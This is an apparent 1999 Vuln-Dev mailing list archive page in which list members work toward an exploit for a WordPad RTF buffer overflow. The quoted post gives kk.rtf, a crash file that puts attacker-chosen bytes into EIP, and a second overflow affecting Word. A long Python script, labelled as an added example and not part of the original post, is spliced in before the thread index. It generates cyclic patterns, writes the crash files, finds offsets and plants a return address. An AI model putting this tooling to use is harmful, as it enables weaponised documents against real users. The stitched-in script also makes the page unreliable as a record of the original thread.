Vulnerability Development mailing list archives
Re: development of wordpad exploit
From: bwrics () ANTIONLINE ORG (Aubrey Smith)
Date: Sat, 20 Nov 1999 01:37:47 -0800
Gerardo, for those of us who are less exploit-savvy, could you please explain how your hack works? The only text that I saw in your attached kk.rtf file was "hola". While Spanish has been known to overflow my buffers (being an English-only speaker), I would like to know how you are using the overflow and how I could duplicate your hack (for educational purposes only, except possibly where my mother-in-law is concerned). Thanks
Date: Fri, 19 Nov 1999 13:40:45 -0300
Reply-To: Gerardo Richarte <core.lists.exploit-dev () CORE-SDI COM>
From: Gerardo Richarte <core.lists.exploit-dev () CORE-SDI COM>
Subject: Re: development of wordpad exploit
To: VULN-DEV () SECURITYFOCUS COM

"hypoclear - lUSt - (Linux Users Strike Today)" wrote:

> In light of the latest Windows vulnerability in WordPad, it would be great if in this forum we could develop an exploit for it. As of now details of the vulnerability are on the net, however no exploit exists yet. This would be an excellent opportunity for all of us who don't really know how to code exploits (yet) to see all the details of developing one. Anyone else like this idea?!?

I've been playing with this since yesterday. Just today I could make the buffer overflow with EIP pointing to 0x61616161, BUT... (of course, what did you expect?). First what's first:

demo:
---------- kk.rtf -----------------------------
{\rtf1\abcdefghijklmnaabbstuvwxyzabcdefghijklmnccddstuvwxyzabcdefghijklmneeffstuvwxyzabcdefghijklmngghhstuvwxyzabcdefghijklmniijjstuvwxyzabcdefghijklmnkkllstuvwxyzabcdefghijklmnmmnnstuvwxyzansi\deff0\deftab720{\fonttbl{\f0\fswiss MS Sans Serif;}{\f1\froman\fcharset2 Symbol;}{\f2\froman Times New Roman;}}
{\colortbl\red0\green0\blue0;}
\deflang1033\pard\plain\f2\fs20 hola
\par }
^@
-----------------------------------------------
[lines finishing in '}}', ';}', 'hola', ' }', '^@']

It's a standard RTF file for the text 'hola', plus an inserted string ('abcde....xyz') before the string 'ansi'. 'ccdd' is the return address (EIP).

If the string 'ansi' is missing (I tested with some other strings, not every other string...) nothing 'good' happens. Any non-letter character before the string 'ccdd' makes nothing happen. I'm not sure which characters can be in this section of the .RTF. If uppercase letters are used, they are lowercased (at least the return address). (!!! That's what it looks like, but the original post says EIP = 0x41414141, which I couldn't reproduce...)

I can't find the [reminding or original] string in memory... I'll continue some more time with this, but it doesn't look too easy to exploit...

richie

PS: if you have Word installed, this is the default opener for RTFs (which doesn't crash), which makes it a little harder to exploit remotely.

PPS: I found another buffer overflow that affects Word. Use a .RTF file like {\rtf\AAAAAAAAAAAA..............} (more than 5000 As). This doesn't make EIP = 0x41414141, it makes ESI = 0x41414141, and if you use more than 10,000 As, it makes EDI = 0x41414141. It may be exploitable, but doesn't look easy.

--
A390 1BBA 2C58 D679 5A71 - 86F9 404F 4B53 3944 C2D0
Investigacion y Desarrollo - CoreLabs - Core SDI
http://www.core-sdi.com

<< kk.rtf >>
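The trick in the quoted kk.rtf is a marker pattern: every few bytes of the over-long control word carry a unique 4-letter group, so whatever lands in EIP tells you the offset at which the return address has to be placed ('ccdd' sits 40 bytes into the inserted string). The script below is an added example, not code from the post or from Core SDI: it generalises that idea to a de Bruijn pattern (every 4-byte window unique, so any register value maps to one offset), rebuilds the two test files the post describes (the kk.rtf layout and the PPS "{\rtf\AAAA...}" variant), and maps a crash value back to an offset. Everything it assumes comes from the post: the pattern is lowercase letters only, because the post reports that non-letters before the marker stop the crash and uppercase gets lowercased; the consequence drawn from that (a usable return address must consist of four lowercase-letter bytes, 0x61..0x7a) is an inference, not something the post verified. The CRLF line endings, the trailing NUL ("^@" in the post) and the sample address 0x6f6e6d6c are assumptions for illustration.

```python
#!/usr/bin/env python3
"""Reproduce the two RTF overflows from the post and map a clobbered register
back to an offset in the over-long control word.

Added example, not code from the post or from Core SDI.  Assumed from the post:
  * kk.rtf crashes WordPad when a long run of letters sits between "{\\rtf1\\"
    and "ansi", and the letters at a fixed offset in that run become EIP;
  * non-letters before that offset stop the crash and uppercase is lowercased,
    so the pattern below is lowercase-only (observed by the post, not proven);
  * "{\\rtf\\AAAA...}" with > 5000 / > 10000 letters sets ESI / EDI to 0x41414141.
CRLF line endings and the trailing NUL ("^@" in the post) are assumptions; RTF
readers ignore CR/LF, so that choice is cosmetic.
"""
import string

LOWER = string.ascii_lowercase

# The post's kk.rtf with the inserted string removed (constructed from the post).
RTF_HEAD = "{\\rtf1\\"
RTF_TAIL = (
    "ansi\\deff0\\deftab720{\\fonttbl{\\f0\\fswiss MS Sans Serif;}"
    "{\\f1\\froman\\fcharset2 Symbol;}{\\f2\\froman Times New Roman;}}\r\n"
    "{\\colortbl\\red0\\green0\\blue0;}\r\n"
    "\\deflang1033\\pard\\plain\\f2\\fs20 hola\r\n"
    "\\par }\r\n"
    "\x00"
)

# The marker scheme the post used: a unique 4-letter marker every 26 bytes.
POST_PATTERN = "".join("abcdefghijklmn" + m + "stuvwxyz"
                       for m in ("aabb", "ccdd", "eeff", "gghh", "iijj", "kkll", "mmnn"))


def de_bruijn(alphabet, n):
    """Yield the de Bruijn sequence B(len(alphabet), n): every n-byte window
    occurs exactly once, so a register value maps back to a single offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, alphabet=LOWER, n=4):
    """First `length` bytes of the pattern; lowercase only (see module docstring)."""
    out = []
    for ch in de_bruijn(alphabet, n):
        if len(out) >= length:
            break
        out.append(ch)
    return "".join(out)


def find_offset(pattern, register_value):
    """Offset in `pattern` that a 32-bit register (e.g. EIP = 0x61616161) was
    loaded from.  x86 is little-endian, so the low byte is first in memory.
    Returns -1 when the value did not come from the pattern (e.g. 0x41414141
    against a lowercase pattern, or a genuine pointer)."""
    needle = register_value.to_bytes(4, "little").decode("latin-1")
    return pattern.find(needle)


def control_word_overflow(run):
    """The post's kk.rtf layout: `run` sits between "{\\rtf1\\" and "ansi"."""
    return RTF_HEAD + run + RTF_TAIL


def addr_to_run_bytes(addr):
    """The 4 characters that must appear at the EIP offset for `addr` to be
    loaded.  Only lowercase letters are accepted, which confines usable
    addresses to 0x61..0x7a in every byte (assumption drawn from the post)."""
    text = addr.to_bytes(4, "little").decode("latin-1")
    if not (text.isascii() and text.isalpha() and text.islower()):
        raise ValueError("address bytes must all be lowercase letters: %r" % text)
    return text


def targeted_file(offset, addr, total=200):
    """kk.rtf variant with `addr` planted at the offset found by find_offset."""
    run = cyclic(total)
    ret = addr_to_run_bytes(addr)
    return control_word_overflow(run[:offset] + ret + run[offset + 4:])


def long_control_word(count, letter="A"):
    """The PPS overflow: {\\rtf\\AAAA...} with > 5000 (ESI) / > 10000 (EDI) letters."""
    return "{\\rtf\\" + letter * count + "}"


def write_rtf(path, text):
    """Write raw bytes so the trailing NUL and the CRLFs survive untouched."""
    with open(path, "wb") as f:
        f.write(text.encode("latin-1"))


if __name__ == "__main__":
    run = cyclic(200)
    write_rtf("kk-cyclic.rtf", control_word_overflow(run))
    # After the crash, feed the register value back in:
    print("EIP 0x61616161 came from offset", find_offset(run, 0x61616161))
    print("post's 'ccdd' marker is at offset", find_offset(POST_PATTERN, 0x64646363))
    write_rtf("long-esi.rtf", long_control_word(5001))
```

Open the generated kk-cyclic.rtf in WordPad under a debugger, read EIP at the crash, and pass it to find_offset with the same run; then targeted_file(offset, addr) plants the address. The lowercase-only check in addr_to_run_bytes is deliberate: it makes the constraint the post observed visible up front, since an address with any byte outside 0x61..0x7a would, by that observation, either be rewritten or stop the crash.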
Current thread:
- Re: development of wordpad exploit, (continued)
- Re: development of wordpad exploit Jason Paulson (Nov 19)
- Re: development of wordpad exploit Riley, Steven (Nov 19)
- Re: development of wordpad exploit Thomas Dullien (Nov 19)
- Re: development of wordpad exploit Harlan Carvey (Nov 19)
- Re: development of wordpad exploit Vanna P. Rella (Nov 19)
- Re: development of wordpad exploit Witold Chrabaszcz (Nov 19)
- Re: development of wordpad exploit Blue Boar (Nov 19)
- Re: development of wordpad exploit Rodrick Brown (Nov 19)
- [Fwd: INZIDER!] Blue Boar (Nov 19)
- Re: development of wordpad exploit Seth R Arnold (Nov 20)
- Re: development of wordpad exploit Witold Chrabaszcz (Nov 19)
- Re: development of wordpad exploit Aubrey Smith (Nov 20)
- Re: development of wordpad exploit Thomas Dullien (Nov 20)
- Re: development of wordpad exploit Dave Harvill (Nov 20)
- Re: development of wordpad exploit Pauli Ojanpera (Nov 21)
- Re: development of wordpad exploit Thomas Dullien (Nov 22)